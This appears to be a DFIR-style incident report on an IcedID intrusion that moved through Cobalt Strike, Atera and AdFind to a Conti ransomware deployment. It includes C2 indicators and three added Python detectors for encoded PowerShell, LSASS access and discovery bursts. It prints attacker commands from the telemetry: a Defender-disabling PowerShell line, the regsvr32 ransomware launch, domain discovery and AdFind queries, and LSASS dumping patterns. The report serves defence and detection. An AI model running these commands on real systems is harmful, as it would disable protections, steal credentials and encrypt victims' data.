In this intrusion from December 2021, the threat actors utilized IcedID as the initial access 
vector. IcedID is a banking trojan that first appeared in 2017. It is usually delivered via 
malspam campaigns and has been widely used as an initial access vector in multiple 
ransomware intrusions. 


Upon execution of the IcedID DLL, discovery activity was performed which was followed by 
the dropping of a Cobalt Strike beacon on the infected host. Along the way, the threat actors 
installed remote management tools such as Atera and Splashtop for persisting in the 
environment. While remaining dormant most of the time, the adversary deployed Conti 
ransomware on the 19th day (shortly after Christmas), resulting in domain wide encryption. 


Case Summary 


We assess with high confidence that the “Stolen Image Evidence” email campaign was used 
to deliver the IcedID DLL. This was first reported by Microsoft in April 2021. 


Upon execution of the IcedID DLL, a connection to a C2 server was established. This was 
followed by the creation of a scheduled task on the beachhead host to establish persistence. 
The task executed the IcedID payload every hour. The IcedID malware then used 
Windows utilities such as net, chcp, nltest, and wmic to perform discovery activity on the 
host. 


After a gap of almost an hour, a Cobalt Strike beacon was dropped and executed on the 
beachhead host. Soon after, another round of discovery was performed from the Cobalt 
Strike beacon focusing on the Windows domain. Nltest and net group were utilized to look 
for sensitive groups such as Domain Admins and Enterprise Admins. Process injection into 
explorer.exe was then observed from the Cobalt Strike Beacon. 


The threat actors proceeded to install remote management tools such as Atera Agent and 
Splashtop. Use of these 3rd party administrative tools allows the threat actors another 
"legitimate" means of persistence and access if they were to lose their malware connection. In 
this intrusion, we observed usage of gmail[.]com and outlook[.]com email accounts for Atera 
agent registration. Soon after, one of the injected Cobalt Strike processes accessed LSASS 
memory to dump credentials from the beachhead. 


On the sixth day of the intrusion, the beachhead host saw new discovery activity with a quick 
nltest followed by the PowerView script Invoke-ShareFinder. On the following day, the 
seventh day of the intrusion, the threat actors made their next move. On that day, a new 
Cobalt Strike server was observed; in fact, over the course of the intrusion, four different 
Cobalt Strike servers were used. From the beachhead host, a DLL was transferred to a 
domain controller over SMB and then a remote service was created on the domain controller 
to execute the Cobalt Strike DLL. 


After getting a foothold on the domain controller, we saw more process injection followed by 
the same pattern of installing Atera for additional persistent access. From the domain 
controller, the threat actors proceeded with more discovery tasks including AdFind and 
Invoke-ShareFinder again. After this, the threat actors went quiet. 


On day nine of the intrusion, the next Cobalt Strike server, which would ultimately be used 
until the end of the intrusion, was observed for the first time. On the tenth day, little activity 
was observed but the threat actors connected to the beachhead host via the Atera agent and 
executed another Cobalt Strike DLL. A little discovery check-in was observed on the 14th day, 
but little else. 


On the 19th day, the threat actors moved towards their final objectives. They reviewed the 
directory structure of several hosts including domain controllers and backup servers. They 
then dropped their final ransomware payload on the beachhead host and attempted to 
execute it using a batch file named backup.bat. However, they found that their execution 
failed. 


They left for a few hours, then returned and attempted to exploit a couple of CVEs in an 
attempt to escalate privileges. The threat actors had already secured domain admin access, 
but it's possible the operator may have thought they lacked permissions when their first 
ransomware execution failed. 


While these exploits appear to have failed, the threat actors fell back on their previously 
captured domain admin credentials and launched two new Cobalt Strike beacons on the domain 
controllers. Finally, twenty minutes after accessing the domain controllers, the threat actors 
dropped the ransomware DLL and the batch script and executed it from the domain 
controller. This time the execution worked as intended and resulted in domain wide 
ransomware. 


Services 


We offer multiple services including a Threat Feed service which tracks Command and 
Control frameworks such as Cobalt Strike, BazarLoader, Covenant, Metasploit, Empire, 
PoshC2, etc. More information on this service and others can be found here. 


We also have artifacts and IOCs available from this case such as pcaps, memory captures, 
files, event logs including Sysmon, Kape packages, and more, under our Security Researcher 
and Organization services. 


Timeline 


Stolen Images Campaign Ends in Conti Ransomware 


23:14 UTC - IcedID Execution: regsvr32.exe 

23:14 UTC - IcedID Command and Control: guguchrome.com (5.181.80.214:80) 

23:14 UTC - Persistence: Scheduled Task 

23:15 UTC - Discovery: 
  cmd.exe /c chcp >&2 
  WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List 
  ipconfig /all 
  systeminfo 
  net config workstation 
  nltest /domain_trusts 

01:06 UTC - Cobalt Strike Beacon: Faicuy4.exe; bunced.net (103.208.86.7:80) 

01:23 UTC - Discovery: 
  nltest /dclist 
  net group /domain "Domain Computers" 
  net group /domain "Domain Admins" 
  net group /domain "Enterprise Admins" 

01:26 UTC - Process Injection: Faicuy4.exe -> explorer.exe 

01:28 UTC - Remote Access Software Install on Beachhead: AteraAgent.exe; SplashtopStreamer3360.exe 

01:40 UTC - Credential Access: dllhost.exe access to lsass memory 

14:58 UTC - Cobalt Strike Command and Control: ljucko32.dll; Edebef4.dll; wayeyoy.com (172.241.29.192); rundll32.exe -> winlogon.exe 

19:51 UTC - Discovery: 
  C:\Windows\system32\cmd.exe /C nltest /dclist: 
  Invoke-ShareFinder 

New Cobalt Strike Command and Control: cirite.com (23.81.246.30:443) 

13:56 UTC - Lateral Movement to Domain Controller: rundll32.exe \\[REDACTED]\C$\ProgramData\c64.dll, StartA 

13:57 UTC - Process Injection: rundll32.exe -> winlogon.exe 

14:01 UTC - Remote Access Software Install on Domain Controller: 
  C:\Windows\System32\msiexec.exe /i C:\programdata\sql.msi 
  AteraAgent.exe 

14:23 UTC - Discovery: 
  adf.bat 
  AdFind.exe 
  Invoke-ShareFinder 

New Cobalt Strike Command and Control: 216.73.159.33:80 (shytur.com) 

19:54 UTC - New Cobalt Strike Beacon & Disable Defender on Beachhead: 
  rundll32.exe C:\ProgramData\file.dll DllRegisterServer (downloaded and executed by the Atera agent) 
  powershell -nop -exec bypass -EncodedCommand ... 
  powershell Set-MpPreference -DisableRealtimeMonitoring $true 

17:04 UTC - Discovery: 
  net group /domain "Domain Admins" 
  C:\Windows\system32\cmd.exe /C nltest /dclist 

16:25 UTC - Backup Discovery: cmd.exe /C dir "\\HOST\C$" /s >> listback.txt 

19:58 UTC - Beachhead Host Attempted Ransomware Deployment: 
  cmd.exe /C backup.bat 
  regsvr32.exe /s /n /i:"-m -net -size 10 -nomutex -p \\HOST\C$" x64.dll 
  (no encryption observed yet) 

22:11 UTC - Privilege Escalation Attempt (CVE-2021-42278 and CVE-2021-42287): 
  Scanning activity 
  QueryName: SAMTHEADMIN-92 
  Image: C:\Windows\system32\dllhost.exe 

22:13 UTC - Lateral Movement to Domain Controllers: 
  QueryName: shytur.com 
  PipeName: \MSSE-3328-server; Image: \\DOMAINCONTROLLER\ADMIN$\61582ab.exe 
  PipeName: \MSSE-7544-server; Image: \\DOMAINCONTROLLER\ADMIN$\044b7e1.exe 

22:31 UTC - Impact: Data Encrypted. Ransomware executed via domain controller: 
  cmd.exe /C backup.bat 
  regsvr32.exe /s /n /i:"-m -net -size 10 -nomutex -p \\HOST\C$" x64.dll 
  Connections via SMB to encrypt and deploy ransom note. 
Report lead: @0xtornado 


Contributing analysts: @yatinwad, @MetallicHack, and @pete_0 


Initial Access 


The IcedID DLL, which gave the threat actors a foothold into the environment, was likely 
delivered by a "Stolen Image Evidence" email campaign. 


"Stolen Images" #ContactForms campaign that submits "https://t.co/uc4QkLQt4b" links into 
contact us forms now dropping an .iso file and #IcedID dll. 
https://t.co/LO3TYOYPli @abuse_ch Looks like https://t.co/ZNWTDSrHT7U incorrectly(?) tags 
the dll as emotet/Heodo... FYI. 


— Sean (@infosecfu) December 9, 2021 


These initial access campaigns reportedly utilize contact forms to send malicious emails to 
intended targets. 


The emails contain a link to a legitimate storage service like those offered by Google and 
Microsoft. In this example, “http://storage.googleapis.com” was used to host a zip file. The 
zip archive contains an ISO file, which once clicked and mounted, shows a document-like 
LNK file. Once the victim opens that LNK file, the IcedID DLL loader executes, downloads, 
and runs the second stage of IcedID. 


Below is a configuration extraction of that initial IcedID malware from an automated 
sandbox analysis of the sample: 


{ 
    "Campaign ID": 870605016, 
    "C2 url": "guguchrome.com" 
} 


Execution 


The graph below shows detailed actions performed through IcedID, including reconnaissance 
and Cobalt Strike beacon drops: 


[Figure: process and network graph of the beachhead activity. Legible nodes and edges: 
- regsvr32.exe /s C:\Users\%REDACTED%\AppData\Local\Temp\Ewge.dll 
- regsvr32.exe C:\Users\%REDACTED%\AppData\Local\Temp\<sha256>.dll (the IcedID DLL, named by its hash; the hash is not legible) 
- C:\Users\%REDACTED%\AppData\Local\Temp\Faicuy4.exe -> Create Remote Thread -> explorer.exe 
- C:\Users\%REDACTED%\AppData\Local\Temp\Edebef4.dll 
- Discovery commands: cmd.exe /c chcp >&2; ipconfig /all; net config workstation; net view /all /domain; net group "Domain Admins" /domain; nltest /dclist; net group /domain "Domain Computers"; dir \\%Domain Computer FQDN%\C$ 
- Network connections: 5.181.80.214:80 -> guguchrome.com; 103.208.86.7:80 -> bunced.net; 172.241.29.192:443 -> wayeyoy.com; cirite.com -> 23.81.246.50; 5.181.80.113:443 -> applesflying.com; 23.106.225.27:443 -> www.rihatin.com; 45.142.215.228:80; 91.199.212.52:80; 192.198.88.110:80 
- mstsc.msi (Atera installer) 
- regsvr32.exe /s /n /i:"-m -net -size 10 -nomutex -p \\%REDACTED%\C$" x64.dll, launched from Backup.bat 
- Dropped files (Sysmon Event ID 11): C:\Windows\System32\spool\x64.dll; C:\Windows\System32\downlevel\x64.dll; C:\Windows\System32\spool\backup.bat] 


Persistence 


Scheduled Tasks 
Only one scheduled task was created during this intrusion. The scheduled task was created 
on the beachhead host upon the execution of the IcedID DLL, and it executed every hour: 


<Exec> 
<Command>rundll32.exe</Command> 
<Arguments>"C:\Users\REDACTED\AppData\Local\{C904416E-A880-3136-ED72- 
AA63AF7DB1F2}\Gaagsp2.dll",DllMain --ob="CapitalLadder\license.dat"</Arguments> 
</Exec> 


Atera Agent 
Threat actors dropped and installed the Atera agent (T1219), using two MSI packages, "sql.msi" 
and "mstsc.msi", from the Cobalt Strike beacons, which allowed them to have a non-malware 
backdoor in the environment. 


Computer Name | Initiating Process Command Line | Action Type | Folder Path | File Name 
Beachhead | Explorer.EXE | FileCreated | C:\ProgramData | mstsc.msi 
Domain Controller | Explorer.EXE | FileCreated | \\[Domain Controller]\C$ | mstsc.msi 
Domain Controller | winlogon.exe | FileCreated | C:\ProgramData | sql.msi 


The installation of those two packages reveals two emails potentially belonging to the 
ransomware operators or affiliates: 


Computer Name | Initiating Process Command Line | Process Command Line 
Beachhead | mstsc.msi | /IntegratorLogin="marsmors1947@gmail.com" /AccountId="0013zZ00002kcnS1AAI" 
Domain Controller | sql.msi (AteraAgent.exe) | /IntegratorLogin="hughess6623@outlook.com" /AccountId="90013200002kbhSdAAI" 


Atera agent is a remote monitoring and management system. 


At one point in the intrusion the threat actors utilized Atera to download and launch a new 
Cobalt Strike beacon on one of the hosts they had installed the agent on. 


[Sysmon process creation event, legible fields:] 
RuleName: technique_id=T1218.002 [remainder truncated] 
CommandLine: rundll32.exe C:\ProgramData\file.dll DllRegisterServer 
ParentCommandLine: Atera agent command package (or8ixLi90Mf) running cmd 
Hashes: [not legible] 

Privilege Escalation 


There were attempts to exploit the Active Directory vulnerabilities CVE-2021-42278 and CVE- 
2021-42287 in order to create privileged accounts. This attempt failed; however, there were 
indicators in DNS requests enumerating accounts for the existence of 
SAMTHEADMIN-XX (XX being a random number). The query status 9003 (NXDOMAIN) indicates that 
the name does not exist. 


The injected process dllhost.exe requesting the SAMTHEADMIN-92 and SAMTHEADMIN-20 
accounts: 


QueryName | QueryStatus | Image 
SAMTHEADMIN-92 | 9003 | C:\Windows\system32\dllhost.exe 
SAMTHEADMIN-20 | 9003 | C:\Windows\system32\dllhost.exe 


We believe the operator used the publicly available script sam-the-admin or a variant 
based on it. Part of the script generates a new computer account name in the form 
SAMTHEADMIN- followed by a random value between 0 and 100, as indicated below. 


The exploitation involves invoking lookups to ensure that the new accounts were created 
successfully, explaining why failed DNS requests were observed. 


Defense Evasion 


Disable Defender 


A base64 encoded PowerShell command was executed on the beachhead which disabled 
Windows Defender AV (T1562.001). 


Encoded Command: 


powershell -nop -exec bypass -EncodedCommand 
UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAG... 


The decoded base64 PowerShell command uses the Set-MpPreference cmdlet to disable 
Defender's real time monitoring: 


Set-MpPreference -DisableRealtimeMonitoring $true 
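The -EncodedCommand blob above is base64 over the UTF-16LE bytes of the script, so a triage step can decode it and match the plaintext. The following is an added example (not code from the report or from The DFIR Report's tooling); the sample command line is constructed by encoding the decoded cmdlet shown above, and the list of Set-MpPreference switches it alerts on is the author's choice:

```python
import base64
import re

# Constructed sample: the encoded blob is generated here from the decoded cmdlet the
# report shows, rather than copied from the incident's (truncated) event.
DECODED_SAMPLE = "Set-MpPreference -DisableRealtimeMonitoring $true"
SAMPLE_CMDLINE = (
    "powershell -nop -exec bypass -EncodedCommand "
    + base64.b64encode(DECODED_SAMPLE.encode("utf-16-le")).decode("ascii")
)
BENIGN_CMDLINE = "powershell -nop -File C:\\scripts\\inventory.ps1"

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the usual short
# forms are listed. The blob is base64 of a UTF-16LE string.
ENCODED_FLAG = re.compile(
    r"(?<![\w-])-(?:e|ec|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)

# Set-MpPreference switches that weaken Defender (ATT&CK T1562.001). The set is
# an assumption for this example; extend it to match your environment's policy.
DEFENDER_TAMPER = re.compile(
    r"Set-MpPreference\b[^\n]*-Disable(?:RealtimeMonitoring|IOAVProtection|"
    r"BehaviorMonitoring|ScriptScanning|IntrusionPreventionSystem)\b",
    re.IGNORECASE,
)


def decode_encoded_command(cmdline):
    """Return the decoded script from a -EncodedCommand launch, or None."""
    match = ENCODED_FLAG.search(cmdline)
    if not match:
        return None
    blob = match.group(1)
    blob += "=" * (-len(blob) % 4)  # tolerate stripped base64 padding
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess(cmdline):
    """Decode the command line and return (decoded_script, findings)."""
    decoded = decode_encoded_command(cmdline)
    findings = []
    if decoded is None:
        return None, findings
    findings.append("encoded PowerShell command line")
    if DEFENDER_TAMPER.search(decoded):
        findings.append("T1562.001: Defender protection disabled via Set-MpPreference")
    return decoded, findings


if __name__ == "__main__":
    for line in (SAMPLE_CMDLINE, BENIGN_CMDLINE):
        print(assess(line))
```

Run it over Sysmon Event ID 1 or 4688 command lines; the decode is cheap enough to apply to every powershell.exe launch, and matching on the decoded text rather than the base64 avoids the trivial evasion of re-encoding with different whitespace.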


Process Injection 


A number of process injections were seen during this intrusion. The Cobalt Strike beacon 
used the CreateRemoteThread Win32 function in order to inject code into running 
processes. The usage of this function triggers Sysmon Event ID 8, a well known pattern of 
CS beacon activity. 


Remote threads were created in the winlogon and explorer processes. 


CreateRemoteThread detected: 
RuleName: technique_id=T1055,technique_name=Process Injection 
UtcTime: [REDACTED] 15:53:25.364 
SourceProcessGuid: {78271c4c-76f5-61b3-6561-000000000500} 
SourceProcessId: 2116 
SourceImage: C:\Windows\System32\regsvr32.exe 
TargetProcessGuid: {78271c4c-a286-61a3-7105-000000000500} 
TargetProcessId: 1680 
TargetImage: C:\Windows\System32\winlogon.exe 
NewThreadId: 5468 
StartAddress: 0x000002029E1B0008 
StartModule: - 
StartFunction: - 


CreateRemoteThread detected: 
RuleName: technique_id=T1055,technique_name=Process Injection 
UtcTime: [REDACTED] 26:20.895 
SourceProcessGuid: {78271c4c-a7fe-61b2-b534-000000000500} 
SourceProcessId: 9560 
SourceImage: C:\Users\[REDACTED]\AppData\Local\Temp\Faicuy4.exe 
TargetProcessGuid: {78271c4c-9fec-61a2-8e00-000000000500} 
TargetProcessId: 6284 
TargetImage: C:\Windows\explorer.exe 
NewThreadId: 10360 
StartAddress: 0x0000000003520002 
StartModule: - 
StartFunction: - 


Credential Access 


LSASS Access 


The threat actors accessed LSASS process memory (T1003.001) on different hosts, including 
domain controllers, using multiple techniques. 


The screenshot below shows the different "DesiredAccess" values requested on the LSASS process 
object from different beacons (dllhost.exe, Edebef4.dll, etc.) or Task Manager: 


[EDR alert screenshot: "Sensitive credential memory read"] 
[8396] dllhost.exe read lsass.exe process memory 
Bytes copied: 6223310 
Number of reads: 1868 
MITRE technique: T1003.001: LSASS Memory 
Target process: [732] lsass.exe 


Process Command Line | Additional Fields | Action Type | Initiating Process Command Line 
lsass.exe | {"DesiredAccess": 5136} | OpenProcessApiCall | "taskmgr.exe" /4 
lsass.exe | {"DesiredAccess": 64} | OpenProcessApiCall | rundll32.exe \\[REDACTED]\c$\ProgramData\c64.dll, StartA 
lsass.exe | {"DesiredAccess": 4112} | OpenProcessApiCall | dllhost.exe 
lsass.exe | {"DesiredAccess": 5136} | OpenProcessApiCall | taskmgr 
lsass.exe | {"DesiredAccess": 64} | OpenProcessApiCall | regsvr32.exe /s "C:\Users\[REDACTED]\AppData\Local\Temp\Edebef4.dll" 


The table below maps the "DesiredAccess" values to the corresponding access rights, 
with examples of credential dumping tools requesting those accesses: 


DesiredAccess | Hex value | Process Access Rights | Offensive Tools 
5136 | 0x1410 | PROCESS_VM_READ (0x0010), PROCESS_QUERY_INFORMATION (0x0400), PROCESS_QUERY_LIMITED_INFORMATION (0x1000)* | Mimikatz (Winver <6), NanoDump 
4112 | 0x1010 | PROCESS_VM_READ (0x0010), PROCESS_QUERY_LIMITED_INFORMATION (0x1000) | Mimikatz (Winver >=6) 
64 | 0x40 | PROCESS_DUP_HANDLE (0x0040) | MirrorDump, HandleKatz 


* A handle that has the PROCESS_QUERY_INFORMATION access right is automatically 
granted PROCESS_QUERY_LIMITED_INFORMATION. 


Those "DesiredAccess" values could be interesting to build detections or hunting queries if 
you are using Sysmon or a similarly verbose monitoring tool. 
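A detection built on these values should decode the mask into its bits rather than matching the three decimal numbers literally, since a dumper can request extra rights and change the decimal value without changing the pattern. The following is an added example (not code from the report); the bit names are the documented Windows process access rights, the sample rows are constructed to mirror the OpenProcessApiCall table above, and the classification labels are the author's:

```python
# Windows process access-right bits (from winnt.h). The report's table uses three of them.
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x2000: "PROCESS_SET_LIMITED_INFORMATION",
}
PROCESS_ALL_ACCESS = 0x1FFFFF  # STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0xFFFF


def parse_mask(value):
    """Accept an int, a decimal string ('5136') or a hex string ('0x1410')."""
    if isinstance(value, int):
        return value
    text = str(value).strip().lower()
    return int(text, 16) if text.startswith("0x") else int(text, 10)


def decode_access(value):
    """Expand a DesiredAccess mask into its named process rights, lowest bit first."""
    mask = parse_mask(value)
    names = [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]
    leftover = mask & ~sum(PROCESS_RIGHTS)
    if leftover:
        names.append(f"OTHER_0x{leftover:X}")  # standard rights, SYNCHRONIZE, etc.
    return names


def classify_lsass_access(value, image):
    """Label an OpenProcess on lsass.exe with the dumping pattern it resembles, if any."""
    mask = parse_mask(value)
    has_read = bool(mask & 0x0010)
    has_query = bool(mask & (0x0400 | 0x1000))
    if has_read and has_query:
        return f"{image}: memory read, Mimikatz/NanoDump-style (VM_READ + QUERY*)"
    if mask & 0x0040:
        return f"{image}: handle duplication, MirrorDump/HandleKatz-style (DUP_HANDLE)"
    if mask == PROCESS_ALL_ACCESS:
        return f"{image}: PROCESS_ALL_ACCESS requested"
    return None


# Constructed sample rows (DesiredAccess, initiating image) modelled on the table above;
# the last row is a query-only open that should produce no finding.
SAMPLE_OPENS = [
    (5136, "taskmgr.exe"),
    (64, "rundll32.exe"),
    (4112, "dllhost.exe"),
    (64, "regsvr32.exe"),
    (0x1000, "svchost.exe"),
]


def triage(opens):
    """Return the findings for every (DesiredAccess, image) pair that matches a pattern."""
    results = []
    for value, image in opens:
        finding = classify_lsass_access(value, image)
        if finding:
            results.append(finding)
    return results


if __name__ == "__main__":
    for value, _ in SAMPLE_OPENS:
        print(value, decode_access(value))
    print(*triage(SAMPLE_OPENS), sep="\n")
```

Sysmon Event ID 10 (ProcessAccess) exposes the same GrantedAccess mask in hex, so the same decode applies there; pair the mask check with an allow-list of images that legitimately read LSASS (Task Manager, EDR sensors) to keep the alert volume down.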


In our case, the access to LSASS process allowed the threat actors to compromise a domain 
admin account, which was then used to move laterally and deploy ransomware. 


Discovery 


Multiple discovery techniques were observed throughout the case. The initial discovery 
techniques were conducted on the beachhead host by the IcedID malware — focusing on 
determining the system language and security products installed (T1518.001). Other familiar 
discovery techniques were then leveraged to establish situational awareness, such as network 
configurations and Windows domain configuration. 


Discovery was achieved using a combination of living off the land techniques (WMIC and 
CMD) and third-party tools. 


cmd.exe /c chcp >&2 

ipconfig /all 

systeminfo 

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List 

net config workstation 

nltest /domain_trusts 

nltest /domain_trusts /all_trusts 

net view /all /domain 

net view /all 

net group "Domain Admins" /domain 

cmd.exe /C nltest /dclist: 

cmd.exe /C net group /domain "Domain Computers" 
cmd.exe /C net group /domain "Enterprise Admins" 
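Individually, each of these commands is something an administrator might run; what stands out is the burst of several distinct discovery categories from one host within a minute of a DLL being registered. The following is an added example (not code from the report) of that burst logic over process-creation records; the host names, timestamps and the five-minute/four-category thresholds are constructed for the example:

```python
import re
from datetime import datetime, timedelta

# Command-line patterns for the discovery utilities listed above, keyed by what each reveals.
DISCOVERY_PATTERNS = {
    "locale": re.compile(r"\bchcp\b", re.I),
    "network_config": re.compile(r"\bipconfig\b.*/all", re.I),
    "system_info": re.compile(r"\bsysteminfo\b", re.I),
    "security_software": re.compile(r"\bwmic\b.*securitycenter2.*antivirusproduct", re.I),
    "workstation_config": re.compile(r"\bnet\s+config\s+workstation\b", re.I),
    "domain_trusts": re.compile(r"\bnltest\b.*/(?:domain_trusts|all_trusts|dclist)", re.I),
    "domain_groups": re.compile(r"\bnet\s+group\b.*/domain\b", re.I),
    "hosts": re.compile(r"\bnet\s+view\b", re.I),
}

# Constructed process-creation records (Sysmon Event ID 1 style) modelled on the
# beachhead sequence in this report; hosts and times are made up for the example.
SAMPLE_RECORDS = [
    {"ts": "2021-12-05T23:15:02", "host": "BEACHHEAD", "cmd": "cmd.exe /c chcp >&2"},
    {"ts": "2021-12-05T23:15:05", "host": "BEACHHEAD", "cmd": "ipconfig /all"},
    {"ts": "2021-12-05T23:15:09", "host": "BEACHHEAD", "cmd": "systeminfo"},
    {"ts": "2021-12-05T23:15:14", "host": "BEACHHEAD",
     "cmd": "WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get * /Format:List"},
    {"ts": "2021-12-05T23:15:20", "host": "BEACHHEAD", "cmd": "net config workstation"},
    {"ts": "2021-12-05T23:15:31", "host": "BEACHHEAD", "cmd": "nltest /domain_trusts"},
    {"ts": "2021-12-05T23:40:00", "host": "WS02", "cmd": "ipconfig /all"},   # lone helpdesk check
    {"ts": "2021-12-06T08:10:00", "host": "WS02", "cmd": "systeminfo"},     # hours later: no burst
]


def classify(cmdline):
    """Return the set of discovery categories a command line falls into (empty if none)."""
    return {name for name, pat in DISCOVERY_PATTERNS.items() if pat.search(cmdline)}


def find_discovery_bursts(records, window=timedelta(minutes=5), threshold=4):
    """Alert when one host runs >= threshold distinct discovery categories inside `window`."""
    per_host = {}
    for rec in sorted(records, key=lambda r: r["ts"]):
        cats = classify(rec["cmd"])
        if cats:
            ts = datetime.fromisoformat(rec["ts"])
            per_host.setdefault(rec["host"], []).append((ts, cats))

    alerts = []
    for host, events in per_host.items():
        for i, (start, _) in enumerate(events):
            seen = set()
            for ts, cats in events[i:]:  # sliding window anchored at each event
                if ts - start > window:
                    break
                seen |= cats
            if len(seen) >= threshold:
                alerts.append({"host": host, "start": start.isoformat(),
                               "categories": sorted(seen)})
                break  # one alert per host per burst is enough
    return alerts


if __name__ == "__main__":
    for alert in find_discovery_bursts(SAMPLE_RECORDS):
        print(alert)
```

Counting distinct categories rather than raw commands is what keeps a script that runs `ipconfig /all` ten times from tripping the rule, while the IcedID sequence (six categories in under thirty seconds) does.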


Threat actors also used "chcp" for discovery of the system locale/language (T1614.001). 
chcp (change code page) is a Microsoft utility for changing the console code page 
(language). In this case, the existing code page was collected using the following 
command: 


cmd.exe /c chcp >&2 


As a test, entering this at a command prompt shows a numeric value. The Microsoft link 
shows the number of the language used (437 — United States). 


It is highly likely that the threat actors were establishing the country of origin based on 
the language used, an extra fail-safe check to ensure certain users or regions were not 
targeted. 


The >&2 parameter could indicate a parameter was expected as part of a script, or possibly 
a redirect using stderr. 


The second discovery was from a different Cobalt Strike beacon “Faicuy4.exe” which focused 
on domain discovery and user groups using the net command. 


Once the threat actors had achieved lateral movement to domain controllers, the AdFind 
utility was employed to enumerate Active Directory objects (T1018). 
Process Command Line 

cmd.exe /C adf.bat 
conhost.exe 0xffffffff -ForceV1 
adfind.exe -f "(objectcategory=person)" 
adfind.exe -f "objectcategory=computer" 
adfind.exe -f "(objectcategory=organizationalUnit)" 
adfind.exe -sc trustdmp 
adfind.exe -subnets -f (objectCategory=subnet) 
adfind.exe -f "(objectcategory=group)" 
adfind.exe -gcb -sc trustdmp 

(Each command appears twice in the telemetry, once for each run of adf.bat.) 


'adf.bat' is a common batch file that we have observed in previous cases; we saw this script in 
2020 as part of a Ryuk intrusion. The recent Conti leaks indicate that Conti operators were 
surprised Ryuk operators were using their file. 
Lawrence Abrams (@LawrenceAbrams): 

Always been speculation that Conti is a rebrand of Ryuk. 

However this chat sounds like the affiliates were surprised that Ryuk uses the same TTPs as Conti. 

Or were both operations run by the same "managers," but the affiliates were left in the dark? 

#ContiLeaks 


{ 
"ts": "2020-10-14T14:03:28.371585", 
"from": "buza@q3mcco35auwcstmt.onion", 
"to": "professor@q3mcco35auwcstmt.onion", 
"body": "https://thedfirreport.com/2020/10/08/ryuks-return/" 
} 
{ 
"ts": "2020-10-14T14:06:04.813669", 
"from": "professor@q3mcco35auwcstmt.onion", 
"to": "buza@q3mcco35auwcstmt.onion", 
"body": "well, not much different from our movements" 
} 
{ 
"ts": "2020-10-14T14:06:08.381836", 
"from": "professor@q3mcco35auwcstmt.onion", 
"to": "buza@q3mcco35auwcstmt.onion", 
"body": "yes, practically nothing" 
} 
{ 
"ts": "2020-10-14T14:06:24.230768", 
"from": "professor@q3mcco35auwcstmt.onion", 
"to": "buza@q3mcco35auwcstmt.onion", 
"body": "adf.bat - this is my fucking batch file" 
} 


The PowerView module Invoke-ShareFinder was executed from the beachhead host and a 
domain controller. 


[PowerShell module logging screenshot: CommandInvocation(Invoke-ShareFinder) with 
ParameterBinding entries CheckShareAccess="True", Verbose="True", HostList="", 
ExcludeStandard="False", ExcludePrint="False", ExcludeIPC="False", NoPing="False", 
CheckAdmin="False", Delay="8", Jitter="0.3", Domain="", followed by 
CommandInvocation(Out-File) with Encoding="ascii", FilePath="C:\ProgramData\shda.txt" and a 
series of InputObject values listing the discovered shares: \\<host>\ADMIN$ - Remote Admin, 
\\<host>\C$ - Default share, \\<host>\NETLOGON - Logon server share, \\<host>\SYSVOL - Logon 
server share, \\<host>\install, \\<host>\log.] 


Some network discovery was conducted using the ping utility to check the existence of hosts 
on the network (T1049). 


Process Command Line 

cmd.exe /C ping [REDACTED] 
cmd.exe /C ping [REDACTED] 
conhost.exe 0xffffffff -ForceV1 
ping \\[REDACTED] 
cmd.exe /C ping [REDACTED] 
conhost.exe 0xffffffff -ForceV1 


Filesystem discovery (T1083) was conducted to collect directory listings into a text file. 


CommandLine: C:\Windows\system32\cmd.exe /C dir [REDACTED] /s >> list.txt 
CurrentDirectory: C:\ProgramData\ 


Other variations included: 

- C:\Windows\system32\cmd.exe /C dir "\\<REDACTED>\C$" /s >> listback.txt 
- C:\Windows\system32\cmd.exe /C dir "\\<REDACTED>\C$" /s >> list1.txt 


Lateral Movement 


On the 6th day, the threat actors began their lateral movement activity using SMB to transfer 
Cobalt Strike DLLs onto a domain controller and another server. 


[Network connection table (Src IP / Country, Src Port, Dst IP / Country, Dst Port, Packets, 
Data Bytes, Info): SMB (445) transfers from the beachhead to the domain controller and the 
other server; rows not legible.] 


Services were then created on the hosts to execute the uploaded Cobalt Strike Beacons. 

On the final day, right before execution of the ransomware, SMB was again used to transfer 
Cobalt Strike Beacon executables to the domain controllers. 


[Network connection table (same columns): SMB (445) transfers of the beacon executables to 
the domain controllers; rows not legible.] 


The beacons were then executed using a remote service. 


Event 7045, Service Control Manager 


General Details 


A service was installed in the system. 


Service Name: 044b7e1 
Service File Name: \\[REDACTED]\ADMIN$\044b7e1.exe 


Service Type: user mode service 
Service Start Type: demand start 
Service Account: LocalSystem 


Known Cobalt Strike named pipes were observed on the Domain Controllers with these 
executable beacons. Named pipe connections can be observed through Sysmon Event ID 18. 


Note that the named pipes followed the MSSE-[0-9]{4}-server pattern, which indicates that 
the threat actors were using the default Cobalt Strike Artifact Kit binaries: 


PipeName: \MSSE-3328-server and Image: 61582ab.exe 
PipeName: \MSSE-7344-server and Image: 044b7e1.exe 
